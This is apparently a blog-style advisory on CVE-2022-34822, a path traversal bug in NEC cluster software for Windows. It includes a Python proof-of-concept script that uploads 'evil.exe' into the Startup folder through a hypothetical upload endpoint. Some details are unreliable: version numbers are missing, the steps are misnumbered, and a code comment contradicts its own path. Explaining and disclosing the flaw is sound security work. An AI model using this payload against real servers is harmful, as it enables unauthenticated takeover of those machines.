In 2022, a serious vulnerability, CVE-2022-34822, was discovered in the leading cluster management and high-availability software from NEC—CLUSTERPRO X 5. for Windows and earlier and EXPRESSCLUSTER X 5. for Windows and earlier (including their SingleServerSafe variants). This flaw enables a remote, unauthenticated attacker to overwrite existing files on the file system and potentially execute arbitrary code with the privileges of the affected service.
If your organization relies on these solutions for business continuity, this is a must-read to protect your data and systems.
What is the Vulnerability?
At its core, CVE-2022-34822 is a path traversal vulnerability. The affected software allows clients to upload files, but doesn’t properly validate user-supplied path data. This means it's possible to sneak files into sensitive or completely unexpected locations using directory traversal tricks (e.g., ../../).
Potentially gain remote code execution on the server.
No authentication is needed – making this an extremely dangerous bug.
How Does the Exploit Work?
Let's break it down in simple terms. The software exposes an API or web interface for file operations. Instead of only writing to allowed safe directories, it trusts user input for the location and name of the file.
Attacker crafts a request to upload a file.
2. In the file path parameter, the attacker uses ..\\ or ../ to traverse directories (known as *directory traversal* or *path traversal*).
3. The vulnerable server concatenates this path with its own internal directory, but without sanitizing it.
4. The file lands right where the attacker wants, possibly overwriting crucial config files or even dropping web shells or executables.
Assume the vulnerable API is at
http://target.server:808/upload
The request might look something like this (in Python, using requests)
import requests
url = 'http://target.server:808/upload'
# Payload: place a file two directories up, in Windows' "Startup" folder (to run on boot!)
malicious_path = r"..\..\..\..\..\..\Users\Public\Start Menu\Programs\Startup\evil.exe"
files = {
'file': (malicious_path, open('evil.exe', 'rb'), 'application/octet-stream')
}
response = requests.post(url, files=files)
if response.status_code == 200:
print("File uploaded! Check if your payload executed.")
else:
print("Upload failed. Check your exploit path.")
What happens here?
The server copies evil.exe to the Windows Startup folder. Next time the server boots, it runs your code.
#### On Linux, you'd do the same with /../../../../../etc/passwd or similar, but this CVE covers Windows installs.
Responsible Disclosure & Public Advisories
- NEC Product Vulnerability - CVE-2022-34822
- Original JVN advisory (Japanese)
Recommendation:
Monitor for suspicious file changes in sensitive directories.
- If unable to patch immediately, consider disabling file upload features or firewalling off the management service.
Why Should You Care?
A single, unauthenticated HTTP/HTTPS request could let an attacker overwrite files anywhere on your server. In the worst case, this means a full remote compromise—your critical cluster service becomes the entry point for a system-wide breach.
Conclusion
CVE-2022-34822 is one of those rare bugs: unauthenticated, easy to exploit, and with potentially catastrophic consequences. If you're running NEC CLUSTERPRO X or EXPRESSCLUSTER X on Windows, patch immediately or implement workarounds, and don't underestimate the risk.
References
- JVN#95781067: Path Traversal in CLUSTERPRO X/EXPRESSCLUSTER X for Windows
- CVE-2022-34822 entry at NVD
- Official NEC Security Notice *(Japanese)*
Timeline
Published on: 11/08/2022 22:15:00 UTC
Last modified on: 11/09/2022 16:30:00 UTC